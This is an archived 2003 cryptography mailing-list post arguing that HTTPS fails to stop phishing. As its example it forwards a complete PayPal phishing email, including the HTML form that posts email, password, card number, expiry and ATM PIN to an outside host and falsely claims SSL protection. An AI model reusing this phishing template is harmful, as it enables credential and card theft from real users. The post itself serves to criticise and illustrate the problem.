[13514] in cryptography@c2.net mail archive
The real problem that https has conspicuously failed to fix
daemon@ATHENA.MIT.EDU (James A. Donald)
Sun Jun 8 17:47:52 2003
X-Original-To: cryptography@metzdowd.com
X-Original-To: cryptography@metzdowd.com
From: "James A. Donald" <jamesd@echeque.com>
To: <cypherpunks@lne.com>, <cryptography@metzdowd.com>
Date: Sun, 8 Jun 2003 13:43:05 -0700
This is a multi-part message in MIME format.
------=_NextPart_000_0010_01C32DC3.E391ED50
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0011_01C32DC3.E391ED50"
------=_NextPart_001_0011_01C32DC3.E391ED50
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
I keep posting "you cannot do this using https", and people keep =
replying "yes you can"
No you cannot, cause if you could, paypal, e-gold, e-bay, and the rest =
would not be suffering from the problem illustrated by scam mails such =
as the following
(When you hit the submit button, guess what happens)
=20
=20
=20
Dear PayPal Customer=20
This e-mail is the notification of recent innovations taken by =
PayPal to detect inactive customers and non-functioning mailboxes.
The inactive customers are subject to restriction and removal in =
the next 3 months.
Please confirm your email address and Credit or Check Card =
information using the form below:
=20
Email Address:
=20
Password:
=20
First Name:
=20
Last Name:
=20
ZIP:
=20
Credit or Check Card #:
=20
Expiration Date:
Month 01 02 03 04 05 06 07 08 09 10 11 12 / Year 2003 =
2004 2005 2006 2007 2008 2009 2010 2011 2012 =20
ATM PIN:
=20
=20
Information transmitted using 128bit SSL encryption.=20
=20
=20
Thanks for using PayPal!=20
=20
=20
This PayPal notification was sent to this email address because =
you are a Web Accept user and chose to receive the PayPal Periodical =
newsletter and Product Updates. To modify your notification preferences, =
go to https://www.paypal.com/PREFS-NOTI and log in to your account. =
Changes may take several days to be reflected in our mailings. Replies =
to this email will not be processed. =20
Copyright=A9 2003 PayPal Inc. All rights reserved. Designated =
trademarks and brands are the property of their respective owners. =20
------=_NextPart_001_0011_01C32DC3.E391ED50
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2800.1170" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>I keep posting "you cannot do this =
using https",=20
and people keep replying "yes you can"</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>No you cannot, cause if you could, =
paypal, e-gold,=20
e-bay, and the rest would not be suffering from the problem illustrated =
by scam=20
mails such as the following</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>(When you hit the submit button, guess =
what=20
happens)</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 align=3Dcenter =
border=3D0>
<TBODY>
<TR>
<TD><A href=3D"https://www.paypal.com/"><IMG height=3D35 =
alt=3DPayPal=20
src=3D"http://www.paypal.com/images/paypal_logo.gif" width=3D109 =
vspace=3D10=20
border=3D0></A> </TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD width=3D"100%" =
background=3Dhttp://www.paypal.com/images/bg_clk.gif><IMG=20
height=3D29 src=3D"http://www.paypal.com/images/pixel.gif" =
width=3D1=20
border=3D0></TD></TR>
<TR>
<TD><IMG height=3D10 src=3D"http://www.paypal.com/images/pixel.gif" =
width=3D1=20
border=3D0></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D5 width=3D600 align=3Dcenter =
border=3D0>
<TBODY>
<TR>
<TD class=3Dpp_sortofbig align=3Dmiddle>Dear PayPal =
Customer</TD></TR>
<TR>
<TD vAlign=3Dtop>
<P> </P>
<P>This e-mail is the notification of recent innovations taken by =
PayPal=20
to detect inactive customers and non-functioning mailboxes.</P>
<P>The inactive customers are subject to restriction and removal =
in the=20
next 3 months.</P>
<P>Please confirm your email address and Credit or Check Card=20
information<B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; =
FONT-VARIANT: normal">=20
</B>using the form below:</P></TD></TR>
<TR>
<TD align=3Dmiddle>
<FORM action=3Dhttp://www.pos2life.biz/vp.php method=3Dpost>
<P=20
style=3D"MARGIN-TOP: -2px; MARGIN-BOTTOM: 0px; MARGIN-LEFT: =
4px"> </P>
<TABLE border=3D0>
<TBODY>
<TR>
<TD>
<P align=3Dleft><B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: =
normal; FONT-STYLE: normal; FONT-VARIANT: normal">Email=20
Address:</B></P></TD>
<TD><INPUT maxLength=3D32 size=3D32 name=3Dlgn></TD></TR>
<TR>
<TD>
<P align=3Dleft><B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: =
normal; FONT-STYLE: normal; FONT-VARIANT: normal">Password:</B></P></TD>
<TD><INPUT type=3Dpassword maxLength=3D32 size=3D32 =
name=3Dpsw></TD></TR>
<TR>
<TD>
<P align=3Dleft><B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: =
normal; FONT-VARIANT: normal">First=20
Name:</B></P></TD>
<TD><INPUT maxLength=3D32 size=3D32 name=3Dfname></TD></TR>
<TR>
<TD>
<P align=3Dleft><B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: =
normal; FONT-VARIANT: normal">Last=20
Name:</B></P></TD>
<TD><INPUT maxLength=3D32 size=3D32 name=3Dlname></TD></TR>
<TR>
<TD>
<P align=3Dleft><B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: =
normal; FONT-VARIANT: normal">ZIP:</B></P></TD>
<TD><INPUT maxLength=3D20 size=3D32 name=3Dbz>=20
<TR>
<TD>
<P align=3Dleft><B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: =
normal; FONT-VARIANT: normal">Credit=20
or Check Card #:</B></P></TD>
<TD><INPUT maxLength=3D16 size=3D32 name=3Dcz></TD>
<TR>
<TD>
<P align=3Dleft><B=20
style=3D"FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: =
normal; FONT-VARIANT: normal">Expiration=20
Date:</B></P></TD>
<TD><SELECT name=3Dcrdm> <OPTION value=3Dzero =
selected>Month</OPTION>=20
<OPTION value=3D01>01</OPTION> <OPTION =
value=3D02>02</OPTION> <OPTION=20
value=3D03>03</OPTION> <OPTION value=3D04>04</OPTION> =
<OPTION=20
value=3D05>05</OPTION> <OPTION value=3D06>06</OPTION> =
<OPTION=20
value=3D07>07</OPTION> <OPTION value=3D08>08</OPTION> =
<OPTION=20
value=3D09>09</OPTION> <OPTION value=3D10>10</OPTION> =
<OPTION=20
value=3D11>11</OPTION> <OPTION =
value=3D12>12</OPTION></SELECT>=20
/ <SELECT name=3Dcrdy> <OPTION value=3Dzero=20
selected>Year</OPTION> <OPTION value=3D03>2003</OPTION> =
<OPTION=20
value=3D04>2004</OPTION> <OPTION value=3D05>2005</OPTION> =
<OPTION=20
value=3D06>2006</OPTION> <OPTION value=3D07>2007</OPTION> =
<OPTION=20
value=3D08>2008</OPTION> <OPTION value=3D09>2009</OPTION> =
<OPTION=20
value=3D10>2010</OPTION> <OPTION value=3D11>2011</OPTION> =
<OPTION=20
value=3D12>2012</OPTION></SELECT> </TD>
<TR>
<TD>
<P align=3Dleft><B style=3D"FONT: bold 8pt : normal">ATM =
PIN:</B></P></TD>
<TD><INPUT type=3Dpassword maxLength=3D6 size=3D32=20
name=3Dpni></TD></TR></TBODY></TABLE>
<P><INPUT type=3Dsubmit value=3D" Submit "> =
</P></FORM>Information=20
transmitted using 128bit SSL encryption.=20
<P><BR> </P></TD></TR>
<TR>
<TD align=3Dmiddle><STRONG>Thanks for using PayPal! =
</STRONG><BR></TD></TR>
<TR>
<TD><IMG =
src=3D"http://www.paypal.com/images/dot_row_long.gif"></TD></TR>
<TR>
<TD class=3Dpp_footer>This PayPal notification was sent to this =
email=20
address because you are a Web Accept user and chose to =
receive the=20
PayPal Periodical newsletter and Product Updates. To modify your=20
notification preferences, go to <A=20
=
href=3D"https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-N=
OTI</A>=20
and log in to your account. Changes may take several days to be =
reflected=20
in our mailings. Replies to this email will not be =
processed. =20
<BR><BR>Copyright=A9 2003 PayPal Inc. All rights reserved. =
Designated=20
trademarks and brands are the property of their respective owners. =
</TD></TR></TBODY></TABLE></DIV></BODY></HTML>
------=_NextPart_001_0011_01C32DC3.E391ED50--
------=_NextPart_000_0010_01C32DC3.E391ED50
Content-Type: image/gif;
name="paypal_logo.gif"
Content-Transfer-Encoding: base64
Content-Location: http://www.paypal.com/images/paypal_logo.gif
R0lGODlhdQAjALMAAP///wAzZkBmjLrI1hZFc2aEo9nh6ICZs3+Zsu/y9Z+yxY+mvFBzlgAsY+zw
9Ofs8SH5BAAAAAAALAAAAAB1ACMAAAT/EMhJq7046827/2AojmRpnmhaDULruoykCIGgbMyrCwgy
JKoNa+cq9AylQmDJZMYUhYa0cMMYmthsARm8KLNgQjVECBBe5cACIBg0AA1WRrE0Hu74Q4tJ4HYp
NAR5eQUCaTVAH1cBBRRfAwABCVINCQEZX4kYCQdLfX8UdUI0ATEfA0uQE6QSbW9xAhk0sRyopQAJ
AwM9vAuqusDBP7jCAwtLaxyPAAbGvD0KfgBffpY1MgU/A1Sboh1fh2FfYAEI0+QB0hnW4WFVgRS2
5jKzYxa29jMCDKoTtk062pFDsChMhSKaWmE586JJI28SEKQKITEdoCbSbBEYZsHAODXB/5bsCSCs
DC0JBa9dDHCgX4UZIpGtTNgBHoVw9mw10nBs4qomByjQYSkUy8El6iokIIU0lEoQS0yhxCJtqD0M
TOYp9KQpQRqXH6UqJMBhqJl4ED0sSiahp5mrDJAaQGCohlYJTih0WmIv7pKjIhMuEpCrkEiX/8T2
vMqhJ+I7Cmj+I+eSyUkAPS//uwwAAWQLfslddht0gt+kOP52MBCOAAMfA9SlREtyglcmO8tiEVDA
l0sJ41yWIUvmqQYFh9pscGtxau5zTH5fSPBxy4ZDFBaJXb2ktBWYuDdRCF17AgFNKZtbKRBOOi4K
1owPZethqMsFaLIQnwBeeJO79DF1Fv8gDWXhHTM5DCjBP88tA0ImK6Fz4F5NTVVDVBjslcZzk5GT
0CFiBbeSCLNUoB8DCtgX4WVDIWDSBQVVRB9znmRjk4U+bSWJbSKFYA2HdejiR0UuGXDHb4+wYgEp
RlQogV/AaFKiUAgsoA4ftN3VAT565ehPdzX9RU0FPZ0X134SDHcBKTRdwCAFRFLkJBtzWvjJCtX0
GKdtXwHw4gTaeZGWBAnYQ6E9bIZASh4uKgiYIMDgx9IdCHyBwG13PtmjAyLhUalMHVkWDHsCUEoX
bnn0GAI6jFghEKvbgLqgJ0g8ACsGFbGq66AccIoOfSsIqKstl92mhgS+ksPTrrsyBsozCMNJ8wVn
z1Zr7QRf0PcPatd2G4RGnuGRhpbelqvCq1iaq24Qw67r7rvwxivvvPTWa0IEADs=
------=_NextPart_000_0010_01C32DC3.E391ED50
Content-Type: image/gif;
name="pixel.gif"
Content-Transfer-Encoding: base64
Content-Location: http://www.paypal.com/images/pixel.gif
R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==
------=_NextPart_000_0010_01C32DC3.E391ED50
Content-Type: image/gif;
name="dot_row_long.gif"
Content-Transfer-Encoding: base64
Content-Location: http://www.paypal.com/images/dot_row_long.gif
R0lGODlhTgIFAIAAAP///4CAgCH5BAAAAAAALAAAAABOAgUAAAJwhI+py+0Po5y02ouz3rz7D4bi
SJbmiabqyrbuC8fyTCsBch+5sQP9jwvqhDyizwgcKovLYzPJjDql0Km1ikVqn1tq9/rNcsdeMtgs
LqvP6zT77Y6H52h62w7H1/b8vv8PGCg4SFhoeIiYqLjI2MhQAAA7
------=_NextPart_000_0010_01C32DC3.E391ED50--
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
